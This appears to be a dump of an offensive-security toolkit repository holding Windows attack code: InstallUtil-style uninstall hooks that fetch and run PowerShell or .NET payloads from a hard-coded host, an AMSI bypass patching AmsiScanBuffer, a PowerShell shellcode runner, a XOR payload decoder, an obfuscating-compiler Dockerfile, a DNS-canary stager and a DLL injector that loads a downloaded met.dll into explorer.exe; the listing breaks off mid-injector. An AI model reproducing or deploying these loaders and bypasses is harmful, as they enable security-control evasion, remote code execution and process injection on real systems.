2 | <%@ Import Namespace="System.IO" %>
3 |
40 |
--------------------------------------------------------------------------------
/csharp/SharpDllPoc.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Runtime.InteropServices;
4 | using System.Windows.Forms;
5 | using RGiesecke.DllExport;
6 |
7 | // Requirements:
8 | // 1. Install Build Tools 2015 - https://www.microsoft.com/en-us/download/details.aspx?id=48159
9 | // 2. Install .NET Framework v3.5 https://www.microsoft.com/en-us/download/details.aspx?id=21
10 | // 3. Add the UnmanagedExports Nuget
11 |
12 | // execute: rundll32.exe GoStager.dll,Start
13 |
14 | namespace GoStager
15 | {
/// <summary>
/// DNS-canary stager PoC: on construction it resolves a random numeric label
/// under a canary zone, so a single DNS query tells the operator the DLL was
/// loaded. The lookup result is discarded; nothing else happens.
/// </summary>
/// <remarks>
/// NOTE(review): strTargetDomain is empty, so the name looked up is just
/// "NNN." (a random label with a trailing dot) and no canary zone ever sees
/// it — fill in the zone before use.
/// </remarks>
public class GoStager
{
    public GoStager()
    {
        // hard-coded root canary domain
        string strTargetDomain = "";
        var random = new Random();

        // 0..999 random label; distinct per load so repeated loads are distinguishable.
        string strDomainName = random.Next(1000).ToString() + "." + strTargetDomain;
        string strDomainAddress = DnsResolve(strDomainName);

        //MessageBox.Show("Do you want to continue?", "Question", MessageBoxButtons.YesNo);
    }
    /// <summary>Entry point when built as an executable.</summary>
    [STAThread]
    public static void Main(string[] args)
    {
        new GoStager();
    }
    /// <summary>Alternate managed entry point (e.g. for a reflective loader).</summary>
    public static void Execute()
    {
        new GoStager();
    }
    /// <summary>
    /// Resolves <paramref name="domainName"/> and returns its first address,
    /// or "Not Found" on any failure. The side effect (the query itself) is
    /// what matters here, not the result.
    /// </summary>
    private static string DnsResolve(string domainName)
    {
        string strAddr;
        try
        {
            strAddr = Dns.GetHostEntry(domainName).AddressList[0].ToString();
        }
        catch
        {
            strAddr = "Not Found";
        }

        return strAddr;
    }
}
/// <summary>
/// Unmanaged export (via the UnmanagedExports/DllExport package) so the DLL
/// can be started with <c>rundll32.exe GoStager.dll,Start</c>. The parameter
/// list matches rundll32's entry-point prototype (hwnd, hinst, cmdline, nCmdShow).
/// </summary>
/// <remarks>
/// NOTE(review): rundll32 documents its entry point as CALLBACK (stdcall);
/// on x86 the Cdecl declared here would leave the stack unbalanced — verify
/// for 32-bit builds. On x64 there is a single calling convention and it is moot.
/// </remarks>
public class Exports
{
    [DllExport("Start", CallingConvention = CallingConvention.Cdecl)]
    public static void GoEntry(IntPtr hwnd,
        IntPtr hinst,
        string lpszCmdLine,
        int nCmdShow)
    {
        new GoStager();
    }
}
64 | }
65 |
--------------------------------------------------------------------------------
/csharp/UninstallerRunspaceBypass.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Configuration.Install;
3 | using System.IO;
4 | using System.Management.Automation;
5 | using System.Management.Automation.Runspaces;
6 | using System.Net;
7 | using System.Text;
8 |
9 | // Need to:
10 | // 1. References > Add > Assemblies > System.Configuration.Install
11 | // 2. References > Browse > c:\windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
12 |
13 | namespace UninstallerBypass
14 | {
/// <summary>
/// Decoy entry point: running the executable directly only prints a line.
/// The real logic is in the Installer subclass below, which runs when the
/// assembly is passed to an installer host in uninstall mode (presumably
/// InstallUtil /U — verify for the intended host).
/// </summary>
class Program
{
    static void Main(string[] args)
    {
        Console.WriteLine("2 + 3 = 2");
    }
}
22 |
/// <summary>
/// Installer class whose Uninstall hook downloads a base64-encoded PowerShell
/// script and runs it in an in-process runspace (System.Management.Automation
/// hosted directly, so no powershell.exe is spawned).
/// </summary>
/// <remarks>
/// Plain HTTP to a hard-coded IP with no integrity check: anyone on the path
/// can replace the script and it runs as this user. Runspace and PowerShell
/// objects are never disposed.
/// </remarks>
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        Runspace rs = RunspaceFactory.CreateRunspace();
        rs.Open();

        // instantiate a PowerShell object
        PowerShell ps = PowerShell.Create();
        ps.Runspace = rs;

        // Server-side encoding of the script:
        // base64 -w 0 payload.ps1 | tee robots.txt
        String cmd = GetPayload("http://192.168.49.83/robots.txt");
        ps.AddScript(cmd);
        // Output and errors from the script are discarded.
        ps.Invoke();
        rs.Close();
    }
    /// <summary>Downloads <paramref name="url"/>, base64-decodes it and returns it as UTF-8 text.</summary>
    /// <param name="url">URL serving the base64 script.</param>
    /// <returns>The decoded script source.</returns>
    /// <exception cref="WebException">Network or HTTP error.</exception>
    /// <exception cref="FormatException">Body is not valid base64.</exception>
    public static string GetPayload(string url)
    {
        // NOTE(review): WebClient is IDisposable and is never disposed.
        WebClient client = new WebClient();
        // No user-agent is set; the default WebClient request has none.
        // Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
        // Honour the system proxy and let it authenticate the current Windows
        // identity (DefaultCredentials) if it challenges.
        client.Proxy = WebRequest.GetSystemWebProxy();
        client.Proxy.Credentials = CredentialCache.DefaultCredentials;
        string compressedEncodedShellcode = client.DownloadString(url);
        byte[] data = Convert.FromBase64String(compressedEncodedShellcode);
        return Encoding.UTF8.GetString(data);
    }
}
53 | }
54 |
--------------------------------------------------------------------------------
/csharp/UninstallerReflectiveDllLoader.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Configuration.Install;
3 | using System.IO;
4 | using System.Management.Automation;
5 | using System.Management.Automation.Runspaces;
6 | using System.Net;
7 | using System.Reflection;
8 |
9 | // Need to:
10 | // 1. References > Add > Assemblies > System.Configuration.Install
11 | // 2. References > Browse > c:\windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
12 |
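namespace UninstallerBypass
{
    // Decoy entry point. The real work runs from the Installer subclass's
    // Uninstall() hook (the class is marked RunInstaller), not from Main.
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Likes initialization...");
        }
    }

    /// <summary>
    /// Installer whose Uninstall() hook downloads a base64-encoded .NET
    /// assembly, loads it from memory and calls the static method
    /// Program.Payload.runner() on it.
    /// </summary>
    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        /// <summary>
        /// Fetches, loads and invokes the downloaded assembly.
        /// </summary>
        /// <param name="savedState">Installer state; not used.</param>
        /// <exception cref="InvalidOperationException">
        /// The assembly does not contain Program.Payload or a runner method.
        /// </exception>
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            byte[] dll = GetShellcode("http://192.168.49.83:8080/main");

            Assembly loaded = Assembly.Load(dll);

            // The original dereferenced both lookups unchecked, so a wrong type
            // or method name surfaced as a bare NullReferenceException.
            Type payloadType = loaded.GetType("Program.Payload");
            if (payloadType == null)
            {
                throw new InvalidOperationException("Type Program.Payload not found in downloaded assembly");
            }

            MethodInfo runner = payloadType.GetMethod("runner");
            if (runner == null)
            {
                throw new InvalidOperationException("Method runner not found on Program.Payload");
            }

            // Static, parameterless: no instance and no argument array.
            runner.Invoke(null, null);
        }

        /// <summary>
        /// Downloads a base64 body from <paramref name="url"/> through the
        /// system proxy (default credentials) and returns the decoded bytes.
        /// </summary>
        /// <param name="url">Location of the base64-encoded assembly.</param>
        /// <returns>The raw assembly bytes.</returns>
        /// <exception cref="WebException">Propagated from the download.</exception>
        /// <exception cref="FormatException">Body was not valid base64.</exception>
        public static byte[] GetShellcode(string url)
        {
            // 3072 == SecurityProtocolType.Tls12; the cast keeps this compiling
            // against reference assemblies that predate the named member.
            // Both ServicePointManager settings are process-global and outlive
            // this call.
            ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
            // NOTE(review): returning true unconditionally accepts any server
            // certificate, so TLS here only hides traffic from passive
            // observers; an on-path attacker can substitute the assembly.
            // Comparing the presented certificate's thumbprint to the expected
            // one in this callback keeps self-signed C2 certs working without
            // that exposure.
            ServicePointManager.ServerCertificateValidationCallback = delegate { return true; };

            using (WebClient client = new WebClient())
            {
                // what be the user agent?
                // Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
                client.Proxy = WebRequest.GetSystemWebProxy();
                client.Proxy.Credentials = CredentialCache.DefaultCredentials;
                string encoded = client.DownloadString(url);
                return Convert.FromBase64String(encoded);
            }
        }
    }
}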
--------------------------------------------------------------------------------
/csharp/UninstallerReflectivePELoader.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Configuration.Install;
3 | using System.IO;
4 | using System.Management.Automation;
5 | using System.Management.Automation.Runspaces;
6 | using System.Net;
7 | using System.Reflection;
8 |
9 | // Need to:
10 | // 1. References > Add > Assemblies > System.Configuration.Install
11 | // 2. References > Browse > c:\windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
12 |
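namespace UninstallerBypass
{
    // Decoy entry point. The real work runs from the Installer subclass's
    // Uninstall() hook (the class is marked RunInstaller), not from Main.
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Likes initialization...");
        }
    }

    /// <summary>
    /// Installer whose Uninstall() hook downloads a base64-encoded .NET
    /// executable, loads it from memory and invokes its entry point.
    /// </summary>
    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        /// <summary>
        /// Fetches and loads the assembly, then runs its Main. Does nothing
        /// if the assembly has no entry point (e.g. a class library).
        /// </summary>
        /// <param name="savedState">Installer state; not used.</param>
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            byte[] bytes = GetShellcode("http://192.168.49.83:8080/main");

            Assembly assembly = Assembly.Load(bytes);
            MethodInfo entry = assembly.EntryPoint;
            if (entry == null)
            {
                return;
            }

            // The original always passed a string[], which makes Invoke throw
            // TargetParameterCountException for a parameterless Main().
            object[] invokeArgs = entry.GetParameters().Length == 0
                ? null
                : new object[] { new string[0] };
            entry.Invoke(null, invokeArgs);
        }

        /// <summary>
        /// Downloads a base64 body from <paramref name="url"/> through the
        /// system proxy (default credentials) and returns the decoded bytes.
        /// </summary>
        /// <param name="url">Location of the base64-encoded assembly.</param>
        /// <returns>The raw assembly bytes.</returns>
        /// <exception cref="WebException">Propagated from the download.</exception>
        /// <exception cref="FormatException">Body was not valid base64.</exception>
        public static byte[] GetShellcode(string url)
        {
            // 3072 == SecurityProtocolType.Tls12; the cast keeps this compiling
            // against reference assemblies that predate the named member.
            // Both ServicePointManager settings are process-global and outlive
            // this call.
            ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
            // NOTE(review): returning true unconditionally accepts any server
            // certificate, so TLS here only hides traffic from passive
            // observers; an on-path attacker can substitute the executable.
            // Comparing the presented certificate's thumbprint to the expected
            // one in this callback keeps self-signed C2 certs working without
            // that exposure.
            ServicePointManager.ServerCertificateValidationCallback = delegate { return true; };

            using (WebClient client = new WebClient())
            {
                // what be the user agent?
                // Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
                client.Proxy = WebRequest.GetSystemWebProxy();
                client.Proxy.Credentials = CredentialCache.DefaultCredentials;
                string encoded = client.DownloadString(url);
                return Convert.FromBase64String(encoded);
            }
        }
    }
}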
--------------------------------------------------------------------------------
/psh/AmsiBypass-AmsiScanBuffer.ps1:
--------------------------------------------------------------------------------
# Resolves the address of an exported function without declaring any P/Invoke
# signature of its own: it locates the already-loaded System.dll, pulls out the
# internal Microsoft.Win32.UnsafeNativeMethods class and calls its
# GetModuleHandle / GetProcAddress wrappers through reflection.
#   $moduleName   module to look in, e.g. amsi.dll (GetModuleHandle only finds
#                 modules already loaded in this process; it does not load them)
#   $functionName export name to resolve
# Returns GetProcAddress's raw result as an IntPtr; a failed lookup is not
# checked here and comes back as zero.
function LookupFunc {

Param ($moduleName, $functionName)

$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
# Every method named GetProcAddress is collected and the first one used,
# presumably because the name is overloaded and GetMethod(name) alone would
# be ambiguous - confirm against the System.dll build in use.
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,@($moduleName)), $functionName))
}
11 |
# Builds a delegate type at runtime with Reflection.Emit so that a raw function
# pointer can be wrapped with Marshal::GetDelegateForFunctionPointer.
#   $func     parameter types of the native function, in order
#   $delType  return type; defaults to [Void]
# Returns the new System.Type (a MulticastDelegate subclass named
# MyDelegateType). The 'Runtime, Managed' implementation flags tell the CLR to
# supply the constructor and Invoke bodies itself, as for any delegate.
function getDelegateType {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
[Parameter(Position = 1)] [Type] $delType = [Void]
)

# Each call defines a new in-memory assembly/module/type of the same name;
# nothing here caches or reuses them.
$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])

$type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')

$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')

return $type.CreateType()
}
# Assemble the export name from fragments so the literal string never appears
# in the script text; the concatenation only happens at run time.
$z1 = 'AmsiS'
$z2 = 'canB'
$z3 = 'uffer'
$z = $z1 + $z2 + $z3
# amsi.dll must already be loaded (LookupFunc uses GetModuleHandle); a zero
# address here is not checked and would make the Copy below fault.
[IntPtr]$funcAddr = LookupFunc amsi.dll $z
$oldProtectionBuffer = 0
# VirtualProtect(lpAddress, dwSize, flNewProtect, &lpflOldProtect); the
# delegate is declared with the last argument by-ref to receive the old value.
$vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32],[UInt32].MakeByRefType()) ([Bool])))
# in rasta's , arg #2 is "[uint32]5"
# 0x40 = PAGE_EXECUTE_READWRITE. The return value is not checked; if this call
# fails the Copy below writes to a read-only code page.
$vp.Invoke($funcAddr, [uint32]5, 0x40, [ref]$oldProtectionBuffer)

# original: $buf = [Byte[]] (0x48, 0x31, 0xC0)
# Six bytes written over the start of the function. Read as x86/x64 opcodes
# they appear to be `mov eax, 0x80070057 ; ret` (return E_INVALIDARG at once) -
# a reviewer's decoding of the bytes, not something the script asserts.
$buf = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)

# in rasta's, last arg is 6
# NOTE(review): the protection change above covered 5 bytes but 6 are copied.
# This only works because VirtualProtect applies to the whole containing page;
# if those 5 bytes ended exactly on a page boundary the sixth write would fault.
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 6)
# restore
#$vp.Invoke($funcAddr, 3, 0x20, [ref]$oldProtectionBuffer)
# NOTE(review): with the restore left commented out the page stays
# execute-read-write for the life of the process; an RWX page inside a
# system DLL's code section is itself something memory scanners look for.
--------------------------------------------------------------------------------
/c/windows/xor_test.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h> // For the SIZE_T and PBYTE types
5 |
6 | // Function declaration
7 | VOID XorByInputKey(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN PBYTE bKey, IN SIZE_T sKeySize);
8 |
9 | // Function to read file into a buffer
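// Reads the whole file at filePath into a malloc'd buffer.
// On success returns the buffer and stores its length in *fileSize; the caller
// owns the buffer and must free() it. On any failure a diagnostic goes to
// stderr, NULL is returned and *fileSize is left untouched.
PBYTE ReadFileToBuffer(const char *filePath, SIZE_T *fileSize) {
    FILE *file = fopen(filePath, "rb");
    if (!file) {
        perror("Failed to open file");
        return NULL;
    }

    // The original ignored a failing ftell(): its -1 became a huge SIZE_T and
    // went straight into malloc() and fread().
    if (fseek(file, 0, SEEK_END) != 0) {
        perror("Failed to seek file");
        fclose(file);
        return NULL;
    }
    long length = ftell(file);
    if (length < 0) {
        perror("Failed to determine file size");
        fclose(file);
        return NULL;
    }
    if (fseek(file, 0, SEEK_SET) != 0) {
        perror("Failed to rewind file");
        fclose(file);
        return NULL;
    }

    // malloc(0) may legally return NULL, which would be misreported as an
    // out-of-memory condition for an empty input; allocate at least one byte.
    PBYTE buffer = (PBYTE)malloc(length > 0 ? (size_t)length : 1);
    if (!buffer) {
        perror("Failed to allocate memory");
        fclose(file);
        return NULL;
    }

    // A short read (truncated file, read error) used to leave uninitialized
    // bytes in the buffer while reporting the full size to the caller.
    size_t got = fread(buffer, 1, (size_t)length, file);
    if (got != (size_t)length) {
        fprintf(stderr, "Failed to read file: expected %ld bytes, got %lu\n",
                length, (unsigned long)got);
        free(buffer);
        fclose(file);
        return NULL;
    }
    fclose(file);

    *fileSize = (SIZE_T)length;
    return buffer;
}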
33 |
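// Entry point:  xor_test <payload_file> <key>
// XORs every byte of the file with the ASCII key, repeated cyclically, and
// writes the result to stdout after a "Decoded Data:" header. XOR is
// symmetric, so the same invocation both encodes and decodes.
// NOTE(review): the key is taken from argv, so it is visible in process
// listings and shell history on the machine that runs this.
int main(int argc, char *argv[]) {
    if (argc != 3) {
        // The original usage string had lost its placeholders.
        fprintf(stderr, "Usage: %s <payload_file> <key>\n", argv[0]);
        return EXIT_FAILURE;
    }

    // Reject an empty key up front: XorByInputKey treats a zero-length key as
    // a no-op, which would silently print the input unchanged.
    SIZE_T keySize = strlen(argv[2]);
    if (keySize == 0) {
        fprintf(stderr, "Key must not be empty\n");
        return EXIT_FAILURE;
    }
    PBYTE key = (PBYTE)argv[2];

    SIZE_T fileSize = 0;
    PBYTE payload = ReadFileToBuffer(argv[1], &fileSize);
    if (!payload) {
        return EXIT_FAILURE;
    }

    // Decode the payload (XOR is symmetric, so the same routine is used)
    XorByInputKey(payload, fileSize, key, keySize);

    // The output is binary, so emit it in one write rather than per-char printf.
    printf("Decoded Data:\n");
    fwrite(payload, 1, fileSize, stdout);
    printf("\n");

    free(payload);
    return EXIT_SUCCESS;
}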
63 |
64 | // Function definition
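// XORs pShellcode[0 .. sShellcodeSize) in place with bKey repeated cyclically.
// Symmetric: applying it twice with the same key restores the original bytes.
// A NULL buffer/key or a zero-length key is a no-op; the original indexed
// bKey[0] regardless of sKeySize, which for a zero-length key is out of bounds.
VOID XorByInputKey(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN PBYTE bKey, IN SIZE_T sKeySize) {
    if (pShellcode == NULL || bKey == NULL || sKeySize == 0) {
        return;
    }
    for (SIZE_T i = 0; i < sShellcodeSize; i++) {
        pShellcode[i] ^= bKey[i % sKeySize];
    }
}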
73 |
--------------------------------------------------------------------------------
/infra/Dockerfile.ollvm:
--------------------------------------------------------------------------------
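# ref https://hub.docker.com/r/snovvcrash/ollvm13
# Build environment: heroims' LLVM 13 obfuscator (OLLVM), wclang, and a static
# MinGW zlib for cross-compiling Windows binaries.
#
# NOTE(review): this image IS the compiler for everything built with it, so its
# inputs matter. Both git clones track a branch tip with no commit pin, and the
# LLVM patch and zlib tarball are fetched over the network with no digest check.
# Set OLLVM_COMMIT and ZLIB_SHA256 at build time for a reproducible toolchain.

# Only ARG may precede the first FROM. The original put the LABEL lines here,
# which Docker rejects (no build stage exists yet), so they moved below.
FROM alpine:3.18

LABEL org.opencontainers.image.title="ollvm13-heroims"
LABEL org.opencontainers.image.authors="thelikes@github.com"
LABEL org.opencontainers.image.description="ollvm13-heroims based build environment with zlib support"

# Optional pins; empty means "track the branch tip" / "skip the digest check".
ARG OLLVM_COMMIT=""
ARG ZLIB_SHA256=""

# Install required packages. --no-cache fetches a fresh index and leaves nothing
# in /var/cache/apk, so the separate `apk update` and trailing rm were redundant.
RUN apk add --no-cache build-base \
    cmake \
    git \
    python3 \
    mingw-w64-gcc \
    mingw-w64-crt \
    mingw-w64-headers \
    nasm \
    zlib \
    zlib-dev \
    wget

# Clone and build the obfuscator project
RUN git clone --depth=1 -b llvm-13.x --single-branch https://github.com/heroims/obfuscator /opt/ollvm && \
    cd /opt/ollvm && \
    if [ -n "$OLLVM_COMMIT" ]; then git fetch --depth=1 origin "$OLLVM_COMMIT" && git checkout "$OLLVM_COMMIT"; fi && \
    wget https://github.com/llvm/llvm-project/commit/ff1681ddb303223973653f7f5f3f3435b48a1983.patch && \
    patch llvm/include/llvm/Support/Signals.h < ff1681ddb303223973653f7f5f3f3435b48a1983.patch && \
    mkdir build && \
    cd build && \
    cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_NEW_PASS_MANAGER=OFF ../llvm && \
    sed -i 's/LLVM_TOOL_CLANG_BUILD:BOOL=OFF/LLVM_TOOL_CLANG_BUILD:BOOL=ON/g' CMakeCache.txt && \
    sed -i "s|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=`realpath ../clang`|g" CMakeCache.txt && \
    make -j$(nproc) && \
    make install && \
    cd / && \
    rm -rf /opt/ollvm

# Clone and build the wclang project
RUN git clone --depth=1 https://github.com/tpoechtrager/wclang /opt/wclang && \
    cd /opt/wclang && \
    cmake . && \
    make -j$(nproc) && \
    make install && \
    cd / && \
    rm -rf /opt/wclang

# Download and build MinGW zlib from source. When ZLIB_SHA256 is given the
# tarball is verified before it is unpacked; the build stops on a mismatch.
RUN wget https://zlib.net/zlib-1.3.1.tar.gz -O /tmp/zlib-1.3.1.tar.gz && \
    if [ -n "$ZLIB_SHA256" ]; then echo "$ZLIB_SHA256  /tmp/zlib-1.3.1.tar.gz" | sha256sum -c -; fi && \
    tar -xzf /tmp/zlib-1.3.1.tar.gz -C /tmp && \
    cd /tmp/zlib-1.3.1 && \
    CC=x86_64-w64-mingw32-gcc ./configure --prefix=/usr/x86_64-w64-mingw32 --static && \
    make && \
    make install && \
    cd / && \
    rm -rf /tmp/zlib-1.3.1 /tmp/zlib-1.3.1.tar.gz

WORKDIR /tmp

CMD ["/bin/sh"]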
--------------------------------------------------------------------------------
/psh/ReflectiveScRunnerPInvoke.ps1:
--------------------------------------------------------------------------------
# Resolves the address of an exported function without declaring any P/Invoke
# signature of its own: it locates the already-loaded System.dll, pulls out the
# internal Microsoft.Win32.UnsafeNativeMethods class and calls its
# GetModuleHandle / GetProcAddress wrappers through reflection.
#   $moduleName   module to look in, e.g. kernel32.dll (GetModuleHandle only
#                 finds modules already loaded in this process)
#   $functionName export name to resolve
# Returns GetProcAddress's raw result as an IntPtr; a failed lookup is not
# checked here and comes back as zero.
function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
# Every method named GetProcAddress is collected and the first one used,
# presumably because the name is overloaded and GetMethod(name) alone would
# be ambiguous - confirm against the System.dll build in use.
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
}
9 |
# Builds a delegate type at runtime with Reflection.Emit so that a raw function
# pointer can be wrapped with Marshal::GetDelegateForFunctionPointer.
#   $func     parameter types of the native function, in order
#   $delType  return type; defaults to [Void]
# Returns the new System.Type (a MulticastDelegate subclass named
# MyDelegateType). The 'Runtime, Managed' implementation flags tell the CLR to
# supply the constructor and Invoke bodies itself, as for any delegate.
function getDelegateType {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
[Parameter(Position = 1)] [Type] $delType = [Void]
)

# Each call defines a new in-memory assembly/module/type of the same name;
# nothing here caches or reuses them.
$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])

$type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')

$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')

return $type.CreateType()
}
24 |
# VirtualAlloc(NULL, 0x1000, 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 =
# PAGE_EXECUTE_READWRITE): one RWX page for the buffer below. The return value
# is not checked; a zero here makes the Copy below fault.
$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)

# "[...]" is a listing elision standing in for the real byte array, not
# PowerShell syntax; the script as shown does not run.
[Byte[]] $buf = 0xfc,[...],0xd5

# NOTE(review): the allocation above is a fixed 0x1000 bytes but the copy
# length is $buf.length; a buffer longer than 4096 bytes writes past the
# allocation. Size the VirtualAlloc call from $buf.length instead.
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
# CreateThread(NULL, 0, lpMem, NULL, 0, NULL): run the buffer on a new thread.
$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
# Block until the thread ends. The delegate declares the timeout as Int32; in
# PowerShell the hex literal 0xFFFFFFFF is the Int32 -1, i.e. INFINITE -
# confirm on the PowerShell version in use.
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF)
--------------------------------------------------------------------------------
/csharp/DllInject.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Net;
6 | using System.Runtime.InteropServices;
7 | using System.Diagnostics;
8 |
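namespace DllInject
{
    /// <summary>
    /// Downloads a DLL into the user's Documents folder and has explorer.exe
    /// load it: the file path is written into explorer's address space and a
    /// remote thread is started at kernel32!LoadLibraryA with that path as its
    /// argument.
    /// </summary>
    class Program
    {
        // 0x001F0FFF is PROCESS_ALL_ACCESS, as the original requested.
        // NOTE(review): VM_OPERATION | VM_WRITE | CREATE_THREAD |
        // QUERY_INFORMATION (0x042A) is all this code actually uses; asking for
        // the minimum is the least-privilege choice.
        private const uint ProcessAllAccess = 0x001F0FFF;
        private const uint MemCommitReserve = 0x3000;     // MEM_COMMIT | MEM_RESERVE
        private const uint PageExecuteReadWrite = 0x40;   // a path buffer would be fine as PAGE_READWRITE (0x04)

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        // SetLastError added so Marshal.GetLastWin32Error() is meaningful below.
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
        static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
        [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
        public static extern IntPtr GetModuleHandle(string lpModuleName);
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool CloseHandle(IntPtr hObject);

        /// <summary>
        /// Entry point. Every Win32 call is checked and reported to the
        /// console; the original ignored all return values and leaked both
        /// handles it opened.
        /// </summary>
        static void Main(string[] args)
        {
            string dir = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
            string dllName = dir + "\\met.dll";

            // NOTE(review): cleartext HTTP and no hash/signature check: whatever
            // answers on this URL is what ends up mapped into explorer.exe.
            using (WebClient wc = new WebClient())
            {
                wc.DownloadFile("http://192.168.49.83/met.dll", dllName);
            }

            Process[] expProc = Process.GetProcessesByName("explorer");
            if (expProc.Length == 0)
            {
                // The original indexed [0] unconditionally and threw
                // IndexOutOfRangeException when explorer was not running.
                Console.WriteLine("explorer.exe not found");
                return;
            }
            int pid = expProc[0].Id;

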